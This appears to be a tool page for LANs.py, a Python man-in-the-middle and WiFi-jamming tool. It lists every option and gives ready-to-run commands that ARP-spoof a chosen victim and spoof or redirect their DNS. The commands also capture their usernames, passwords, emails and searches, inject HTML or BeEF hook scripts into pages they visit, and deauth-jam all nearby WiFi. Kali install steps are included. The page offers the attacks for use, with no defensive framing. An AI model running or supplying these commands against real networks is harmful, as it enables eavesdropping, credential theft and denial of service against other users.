LANs.py automatically finds the most active WLAN users then spies on one of them and/or inject arbitrary HTML/JS into pages they visit.
Individually poisons the ARP tables of the target box, the router and the DNS server if necessary. Does not poison anyone else on the network. Displays all most the interesting bits of their traffic and can inject custom html into pages they visit. Cleans up after itself.
Also can be used to continuously jam nearby WiFi networks. This has an approximate range of a 1 block radius, but this can vary based off of the strength of your WiFi card. This can be fine-tuned to allow jamming of everyone or even just one client. Cannot jam WiFi and spy simultaneously.
Author: Dan McInerney
LANs.py [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC] [-d] [-v] [-dns DNSSPOOF] [-a] [-set] [-p] [-na] [-n] [-i INTERFACE] [-r REDIRECTTO] [-rip ROUTERIP] [-rmac ROUTERMAC] [-pcap PCAP] [-s SKIP] [-ch CHANNEL] [-m MAXIMUM] [-no] [-t TIMEINTERVAL] [--packets PACKETS] [--directedonly] [--accesspoint ACCESSPOINT] [--jam]
optional arguments: -h, --help show this help message and exit -b BEEF, --beef BEEF Inject a BeEF hook URL. Example usage: -b http://192.168.0.3:3000/hook.js -c CODE, --code CODE Inject arbitrary html. Example usage (include quotes): -c '<title>New title</title>' -u, --urlspy Show all URLs and search terms the victim visits or enters minus URLs that end in .jpg, .png, .gif, .css, and .js to make the output much friendlier. Also truncates URLs at 150 characters. Use -v to print all URLs and without truncation. -ip IPADDRESS, --ipaddress IPADDRESS Enter IP address of victim and skip the arp ping at the beginning which would give you a list of possible targets. Usage: -ip <victim IP> -vmac VICTIMMAC, --victimmac VICTIMMAC Set the victim MAC; by default the script will attempt a few different ways of getting this so this option hopefully won't be necessary -d, --driftnet Open an xterm window with driftnet. -v, --verboseURL Shows all URLs the victim visits but doesn't limit the URL to 150 characters like -u does. -dns DNSSPOOF, --dnsspoof DNSSPOOF Spoof DNS responses of a specific domain. Enter domain after this argument. An argument like [facebook.com] will match all subdomains of facebook.com -a, --dnsall Spoof all DNS responses -set, --setoolkit Start Social Engineer's Toolkit in another window. -p, --post Print unsecured HTTP POST loads, IMAP/POP/FTP/IRC/HTTP usernames/passwords and incoming/outgoing emails. Will also decode base64 encrypted POP/IMAP username/password combos for you. -na, --nmapaggressive Aggressively scan the target for open ports and services in the background. Output to ip.add.re.ss.log.txt where ip.add.re.ss is the victim's IP. -n, --nmap Scan the target for open ports prior to starting to sniffing their packets. -i INTERFACE, --interface INTERFACE Choose the interface to use. Default is the first one that shows up in `ip route`. -r REDIRECTTO, --redirectto REDIRECTTO Must be used with -dns DOMAIN option. Redirects the victim to the IP in this argument when they visit the domain in the -dns DOMAIN option -rip ROUTERIP, --routerip ROUTERIP Set the router IP; by default the script with attempt a few different ways of getting this so this option hopefully won't be necessary -rmac ROUTERMAC, --routermac ROUTERMAC Set the router MAC; by default the script with attempt a few different ways of getting this so this option hopefully won't be necessary -pcap PCAP, --pcap PCAP Parse through a pcap file -s SKIP, --skip SKIP Skip deauthing this MAC address. Example: -s 00:11:BB:33:44:AA -ch CHANNEL, --channel CHANNEL Listen on and deauth only clients on the specified channel. Example: -ch 6 -m MAXIMUM, --maximum MAXIMUM Choose the maximum number of clients to deauth. List of clients will be emptied and repopulated after hitting the limit. Example: -m 5 -no, --noupdate Do not clear the deauth list when the maximum (-m) number of client/AP combos is reached. Must be used in conjunction with -m. Example: -m 10 -n -t TIMEINTERVAL, --timeinterval TIMEINTERVAL Choose the time interval between packets being sent. Default is as fast as possible. If you see scapy errors like 'no buffer space' try: -t .00001 --packets PACKETS Choose the number of packets to send in each deauth burst. Default value is 1; 1 packet to the client and 1 packet to the AP. Send 2 deauth packets to the client and 2 deauth packets to the AP: -p 2 --directedonly Skip the deauthentication packets to the broadcast address of the access points and only send them to client/AP pairs --accesspoint ACCESSPOINT Enter the MAC address of a specific access point to target --jam Jam all wifi in range
LANs.py Usage Example
python LANs.py -u -p
Active target identification which ARP spoofs the chosen target and outputs all the interesting non-HTTPS data they send or request. There's no -ip option so this will ARP scan the network, compare it to a live running promiscuous capture, and list all the clients on the network. Attempts to tag the targets with a Windows netbios name and prints how many data packets they are sending/receiving. The ability to capture data packets they send is very dependent on physical proximity and the power of your network card. Ctrl-C when you're ready and pick your target which it will then ARP spoof.
Supports interception and harvesting of data from the following protocols: HTTP, FTP, IMAP, POP3, IRC. Will print the first 135 characters of URLs visited and ignore URLs ending in .jpg, .jpeg, .gif, .css, .ico, .js, .svg, and .woff. Will also print all protocol username/passwords entered, searches made on any site, emails sent/received, and IRC messages sent/received.
Running LANs.py without argument will give you the list of active targets and upon selecting one, it will act as a simple ARP spoofer.
Another common usage:
python LANs.py -u -p -d -ip 192.168.0.10
-d: open an xterm with driftnet to see all images they view
-ip: target this IP address and skip the active targeting at the beginning
python LANs.py -b http://192.168.0.5:3000/hook.js
python LANs.py -c '<title>Owned.</title>'
Inject arbitrary HTML into pages the victim visits. First tries to inject it after the first <head> tag and failing that, injects prior to the first </head> tag. This example will change the page title to 'Owned.'
Read from pcap:
python LANs.py -pcap libpcapfilename -ip 192.168.0.10
To read from a pcap file you must include the target's IP address with the -ip option. It must also be in libpcap form which is the most common anyway. One advantage of reading from a pcap file is that you do not need to be root to execute the script.
python LANs.py -a -r 22.214.171.124 python LANs.py -dns eff.org
Example 1: The -a option will spoof every single DNS request the victim makes and when used in conjunction with -r it will redirect them to -r's argument address. The victim will be redirected to stallman.org (126.96.36.199) no matter what they type in the address bar.
Example 2: This will spoof the domain eff.org and subdomains of eff.org. When there is no -r argument present with the -a or -dns arguments the script will default to sending the victim to the attacker's IP address. If the victim tries to go to eff.org they will be redirected to the attacker's IP.
Most aggressive usage:
python LANs.py -v -d -p -n -na -set -a -r 188.8.131.52 -c '<title>Owned.</title>' -b http://192.168.0.5:3000/hook.js -ip 192.168.0.10
Jam all WiFi networks:
python LANs.py --jam
Jam just one access point (router):
python Lans.py --jam --accesspoint 01:MA:C0:AD:DY
How to install LANs.py
Installation on Kali Linux
sudo apt-get install -y python-nfqueue python-scapy python-twisted nbtscan git clone https://github.com/DanMcInerney/LANs.py.git cd LANs.py/ sudo ./LANs.py --help
- How to perform selective jamming of Wi-Fi networks and clients (DoS attack on individual access points / clients)
- Alfa AWUS052NH – Kali Linux Compatible USB Adapter
- Three ways to put wireless interface in Monitor mode and Managed mode
- Best Kali Linux Compatible USB Wi-Fi adapters 2017